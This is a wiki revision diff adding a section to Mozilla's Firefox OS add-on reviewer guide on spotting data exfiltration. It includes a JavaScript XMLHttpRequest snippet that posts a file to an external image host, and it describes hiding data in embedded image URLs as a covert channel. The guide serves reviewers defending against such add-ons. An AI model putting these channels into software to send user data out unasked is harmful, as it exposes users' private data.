Confirmed users
184
edits
Marketplace/Reviewers/Apps/Guide/Firefox OS Add-on Security: Difference between revisions
Marketplace/Reviewers/Apps/Guide/Firefox OS Add-on Security (view source)
Revision as of 23:21, 29 October 2015
, 29 October 2015section on communication channels added
(obfuscation tipps added) |
(section on communication channels added) |
||
| Line 119: | Line 119: | ||
= Guide = | = Guide = | ||
== External communication == | |||
When an add-on is completely self-contained and doesn't make outside connections, it hardly represents a risk for data exfiltration. But when it does, the most common channel is established by HTTP GET and POST requests. Look for instances of ''XMLHttpRequest'', like: | |||
var xhr = new XMLHttpRequest(); | |||
xhr.open('POST', 'https://api.imgur.com/3/image'); | |||
var fd = new FormData(); | |||
fd.append("image", file); | |||
[...] | |||
xhr.send(fd); | |||
The corresponding ''.open()'' call closeby takes the URI for the request, in this case from a string constant. The call to ''.send()'' finally posts the request with the form data which comes from the ''file'' variable. | |||
==== Covert channels ==== | |||
A sneakier communication channels to an external server is locally embedding of an image file from a URL that encodes data in the file name, some GET parameter, or even the host name. | |||
=== Take-aways === | |||
* Beware of non-static URIs that are constructed from variables. | |||
* Follow those variables. | |||
* Is the resulting URI always something you'd expect from the add-on's description? | |||
== Obfuscation == | == Obfuscation == | ||